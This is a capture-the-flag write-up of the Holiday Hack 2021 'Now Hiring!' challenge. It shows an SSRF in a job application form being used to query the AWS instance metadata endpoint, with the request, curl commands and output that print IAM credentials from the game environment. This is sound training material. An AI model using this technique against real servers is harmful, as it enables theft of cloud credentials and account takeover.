Holiday Hack 2021: Now Hiring!

• Holiday Hack 2021
• 1) KringleCon Orientation
• 2) Where in the World is Caramel Santaigo?
• 3) Thaw Frost Tower's Entrace
• 4) Slot Machine Investigation
• 5) Strange USB Device
• 6) Shellcode Primer
• 7) Printer Exploitation
• 8) Kerberoasting on an Open Fire
• 9) Splunk!
• 10) Now Hiring!
• 11) Customer Complaint Analysis
• 12) Frost Tower Website Checkup
• 13) FPGA Programming
• Appendix A: Log4j Terminals

Objective

Terminal - IMDS Exploration

Challenge

Noxious O D’or is hanging out in Jack’s bathroom with the IMDS terminal:

Hey, this is the executive restroom. Wasn’t that door closed?

I’m Noxious O’Dor. And I’ve gotta say, I think that Jack Frost is just messed up.

I mean, I’m no expert, but his effort to “win” against Santa by going bigger and bolder seems bad.

You know, I’m having some trouble with this IMDS exploration. I’m hoping you can give me some help in solving it.

If you do, I’ll be happy to trade you for some hints on SSRF! I’ve been studying up on that and have some good ideas on how to attack it!

What follows is a walkthrough of how to use and exploit IMDS.

Solution

This is more of a walkthrough than a challenge, but I’ll explain what’s going on in this video:

Now Hiring!

Hints

Noxious seems almost relieved I made it through the exploration:

Phew! That is something extra! Oh, and you solved the challenge too? Great!

Cloud assets are interesting targets for attackers. Did you know they automatically get IMDS access?

I’m very concerned about the combination of SSRF and IMDS access.

Did you know it’s possible to harvest cloud keys through SSRF and IMDS attacks?

Dr. Petabyte told us, “anytime you see URL as an input, test for SSRF.”

With an SSRF attack, we can make the server request a URL. This can reveal valuable data!

The AWS documentation for IMDS is interesting reading.

The exploration unlocks only one hint, reiterating what Noxious had to say:

• The AWS documentation for IMDS is interesting reading.

Challenge

This challenge starts with a link to the Jack Frost Tower job application server:

Click for full size image

Solution

The most interesting page on the site is the form to apply:

Click for full size image

The opportunity to upload is always interesting, but the hints were focused on SSRF, and there’s a URL to submit here. I’ll fill out the form and try some URLs. I tried to get a connection back (through ngrok), but nothing came back (I suspect Firewall prevented). Given what I just was shown with IMDS, I tried that, submitting http://169.254.169.254/latest as the URL.

The resulting page had a broken image:

I’ll inspect that further by right clicking and opening image in new tab. It leads to https://apply.jackfrosttower.com/images/0xdf.jpg, and it’s not a valid image:

If I curl that, I can see it’s the results of an SSRF:

$ curl https://apply.jackfrosttower.com/images/0xdf.jpg
dynamic
meta-data

I’ll send that submission request to Burp repeater to save having to enter all the info again. Interestingly, it’s a GET request:

GET /?inputName=0xdf&inputEmail=0xdf%40aol.com&inputPhone=123&inputField=Crayon+on+walls&inputField=Failure+to+feed+a+family+pet&inputField=Giving+super+atomic+wedgies&inputField=Naughty+words&inputField=Playing+ball+in+house&inputField=Talking+back+to+parents+or+other+adults&inputField=Tantrum+in+a+private+facility&inputField=Throwing+rocks+%28at+people%29&inputField=Throwing+rocks+%28non-person+target%29&resumeFile=&inputWorkSample=http://169.254.169.254/latest/&additionalInformation=http%3A%2F%2F169.254.169.254%2Flatest%2Fmeta-data%2F&submit= HTTP/2
Host: apply.jackfrosttower.com
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:95.0) Gecko/20100101 Firefox/95.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://apply.jackfrosttower.com/?p=apply
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers

I’ll update the url to http://169.254.169.254/latest/meta-data/iam/security-credentials, and send it. Since I didn’t change my name, the same image is overwritten with the new results:

$ curl https://apply.jackfrosttower.com/images/0xdf.jpg
jf-deploy-role

Adding that to the end of the url and resubmitting updates the image to the security creds:

$ curl https://apply.jackfrosttower.com/images/0xdf.jpg
{
        "Code": "Success",
        "LastUpdated": "2021-05-02T18:50:40Z",
        "Type": "AWS-HMAC",
        "AccessKeyId": "AKIA5HMBSK1SYXYTOXX6",
        "SecretAccessKey": "CGgQcSdERePvGgr058r3PObPq3+0CfraKcsLREpX",
        "Token": "NR9Sz/7fzxwIgv7URgHRAckJK0JKbXoNBcy032XeVPqP8/tWiR/KVSdK8FTPfZWbxQ==",
        "Expiration": "2026-05-02T18:50:40Z"
}

The SecretAccessKey is CGgQcSdERePvGgr058r3PObPq3+0CfraKcsLREpX, which solves the challenge.

« 9) Splunk!11) Customer Complaint Analysis »